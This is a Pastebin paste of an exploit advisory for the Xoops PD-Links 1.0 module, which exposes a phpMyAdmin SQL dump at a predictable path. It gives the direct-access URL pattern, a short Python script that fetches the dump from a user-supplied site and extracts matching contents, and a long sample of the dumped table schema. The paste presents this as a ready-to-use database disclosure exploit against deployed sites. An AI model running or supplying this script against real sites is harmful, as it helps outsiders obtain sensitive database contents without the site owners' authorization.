Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Xoops 1.0.2 PD-Links Modules 1.0 Krobi Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 03/03/2019
- # Vendor Homepage : xoops.org ~ power-dreams.com
- # Software Download Link : xoops.org/modules/repository/visit.php?cid=40&lid=1491
- # Software Information Link : xoops.org/modules/repository/singlefile.php?cid=40&lid=1491
- # Software Version : 1.0
- Compatible with Xoops 1.0.2 and 2.4.x
- # Software Technical System Requirements :
- Price: Free | Platform: 2.4.x | License: Sun Solaris Source Code
- (Foundation Release) License (v. 1.1) | Limitations: None
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type :
- CWE-200 [ Information Exposure ]
- CWE-538 [ File and Directory Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Acunetix Information Link about => phpMyAdmin SQL dump Web Vulnerability
- acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
- # Reference Link : cxsecurity.com/issue/WLB-2019030010
- ####################################################################
- # Description about Software :
- ***************************
- This Module is based on the WF-Downloads 2.05a Module. It is called PD-Links Modules.
- This new features make it easier for you to administrate the module.
- ####################################################################
- # Impact :
- ***********
- * The product stores sensitive information in files or directories that are accessible
- to actors outside of the intended control sphere.
- * An information exposure is the intentional or unintentional disclosure of information
- to an actor that is not explicitly authorized to have access to that information.
- * phpMyAdmin is a free software tool written in PHP, intended to handle the administration of
- MySQL over the World Wide Web. It can be used to dump a database or a collection of
- databases for backup or transfer to another SQL server (not necessarily a MySQL server).
- The dump typically contains SQL statements to create the table, populate it, or both.
- This file contains an phpMyAdmin SQL dump. This information is highly sensitive and
- should not be found on a production system.
- ####################################################################
- Direct Access =>
- ***************
- VULNERABLESITE/sql/PDlinks.sql
- # Database Disclosure Information Exposure Exploit :
- ***********************************************
- #!/usr/bin/python
- import string
- import re
- from urllib2 import Request, urlopen
- disc = "/sql/PDlinks.sql"
- url = raw_input ("URL: ")
- req = Request(url+disc)
- rta = urlopen(req)
- print "Result"
- html = rta.read()
- rdo = str(re.findall("resources.*=*", html))
- print rdo
- exit
- ####################################################################
- # Example Information about SQL Dump File =>
- ******************************************
- # phpMyAdmin SQL Dump
- # version 2.5.5-pl1
- # http://www.phpmyadmin.net
- #
- # Host: localhost
- # Generation Time: Jul 25, 2004 at 11:45 PM
- # Server version: 3.23.56
- # PHP Version: 4.3.4
- #
- # Database : `205test`
- #
- # --------------------------------------------------------
- #
- # Table structure for table `PDlinks_broken`
- #
- CREATE TABLE PDlinks_broken (
- reportid int(5) NOT NULL auto_increment,
- lid int(11) NOT NULL default '0',
- sender int(11) NOT NULL default '0',
- ip varchar(20) NOT NULL default '',
- date varchar(11) NOT NULL default '0',
- confirmed enum('0','1') NOT NULL default '0',
- acknowledged enum('0','1') NOT NULL default '0',
- PRIMARY KEY (reportid),
- KEY lid (lid),
- KEY sender (sender),
- KEY ip (ip)
- ) ENGINE=MyISAM;
- #
- # Dumping data for table `PDlinks_broken`
- #
- # --------------------------------------------------------
- #
- # Table structure for table `PDlinks_cat`
- #
- CREATE TABLE PDlinks_cat (
- cid int(5) unsigned NOT NULL auto_increment,
- pid int(5) unsigned NOT NULL default '0',
- title varchar(50) NOT NULL default '',
- imgurl varchar(150) NOT NULL default '',
- description varchar(255) NOT NULL default '',
- total int(11) NOT NULL default '0',
- spotlighttop int(11) NOT NULL default '0',
- spotlighthis int(11) NOT NULL default '0',
- nohtml int(1) NOT NULL default '0',
- nosmiley int(1) NOT NULL default '0',
- noxcodes int(1) NOT NULL default '0',
- noimages int(1) NOT NULL default '0',
- nobreak int(1) NOT NULL default '1',
- weight int(11) NOT NULL default '0',
- PRIMARY KEY (cid),
- KEY pid (pid)
- ) ENGINE=MyISAM;
- #
- # Dumping data for table `PDlinks_cat`
- #
- # --------------------------------------------------------
- #
- # Table structure for table `PDlinks_links`
- #
- CREATE TABLE PDlinks_links (
- lid int(11) unsigned NOT NULL auto_increment,
- cid int(5) unsigned NOT NULL default '0',
- title varchar(100) NOT NULL default '',
- url varchar(255) NOT NULL default '',
- screenshot varchar(255) NOT NULL default '',
- submitter int(11) NOT NULL default '0',
- publisher varchar(255) NOT NULL default '',
- status tinyint(2) NOT NULL default '0',
- date int(10) NOT NULL default '0',
- hits int(11) unsigned NOT NULL default '0',
- rating double(6,4) NOT NULL default '0.0000',
- votes int(11) unsigned NOT NULL default '0',
- comments int(11) unsigned NOT NULL default '0',
- forumid int(11) NOT NULL default '0',
- published int(11) NOT NULL default '1089662528',
- expired int(10) NOT NULL default '0',
- updated int(11) NOT NULL default '0',
- offline tinyint(1) NOT NULL default '0',
- description text NOT NULL,
- ipaddress varchar(120) NOT NULL default '0',
- notifypub int(1) NOT NULL default '0',
- PRIMARY KEY (lid),
- KEY cid (cid),
- KEY status (status),
- KEY title (title(40))
- ) ENGINE=MyISAM;
- #
- # Dumping data for table `PDlinks_links`
- #
- # --------------------------------------------------------
- #
- # Table structure for table `PDlinks_indexpage`
- #
- CREATE TABLE PDlinks_indexpage (
- indeximage varchar(255) NOT NULL default 'blank.png',
- indexheading varchar(255) NOT NULL default 'PD-Links',
- indexheader text NOT NULL,
- indexfooter text NOT NULL,
- nohtml tinyint(8) NOT NULL default '1',
- nosmiley tinyint(8) NOT NULL default '1',
- noxcodes tinyint(8) NOT NULL default '1',
- noimages tinyint(8) NOT NULL default '1',
- nobreak tinyint(4) NOT NULL default '0',
- indexheaderalign varchar(25) NOT NULL default 'left',
- indexfooteralign varchar(25) NOT NULL default 'center',
- FULLTEXT KEY indexheading (indexheading),
- FULLTEXT KEY indexheader (indexheader),
- FULLTEXT KEY indexfooter (indexfooter)
- ) ENGINE=MyISAM;
- #
- # Dumping data for table `PDlinks_indexpage`
- #
- INSERT INTO PDlinks_indexpage VALUES ('logo-en.gif', 'PD-Links', '<div><b>Welcome to the PD Links Section.</b></div>', 'PD-Links', 0, 0, 0, 0, 1, 'left', 'Center');
- # --------------------------------------------------------
- #
- # Table structure for table `PDlinks_mod`
- #
- CREATE TABLE PDlinks_mod (
- requestid int(11) NOT NULL auto_increment,
- lid int(11) unsigned NOT NULL default '0',
- cid int(5) unsigned NOT NULL default '0',
- title varchar(255) NOT NULL default '',
- url varchar(255) NOT NULL default '',
- screenshot varchar(255) NOT NULL default '',
- submitter int(11) NOT NULL default '0',
- publisher text NOT NULL,
- status tinyint(2) NOT NULL default '0',
- date int(10) NOT NULL default '0',
- hits int(11) unsigned NOT NULL default '0',
- rating double(6,4) NOT NULL default '0.0000',
- votes int(11) unsigned NOT NULL default '0',
- comments int(11) unsigned NOT NULL default '0',
- forumid int(11) NOT NULL default '0',
- published int(10) NOT NULL default '0',
- expired int(10) NOT NULL default '0',
- updated int(11) NOT NULL default '0',
- offline tinyint(1) NOT NULL default '0',
- description text NOT NULL,
- modifysubmitter int(11) NOT NULL default '0',
- requestdate int(11) NOT NULL default '0',
- PRIMARY KEY (requestid)
- ) ENGINE=MyISAM;
- #
- # Dumping data for table `PDlinks_mod`
- #
- # --------------------------------------------------------
- #
- # Table structure for table `PDlinks_votedata`
- #
- CREATE TABLE PDlinks_votedata (
- ratingid int(11) unsigned NOT NULL auto_increment,
- lid int(11) unsigned NOT NULL default '0',
- ratinguser int(11) NOT NULL default '0',
- rating tinyint(3) unsigned NOT NULL default '0',
- ratinghostname varchar(60) NOT NULL default '',
- ratingtimestamp int(10) NOT NULL default '0',
- PRIMARY KEY (ratingid),
- KEY ratinguser (ratinguser),
- KEY ratinghostname (ratinghostname),
- KEY lid (lid)
- ) ENGINE=MyISAM;
- #
- # Dumping data for table `PDlinks_votedata`
- #
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment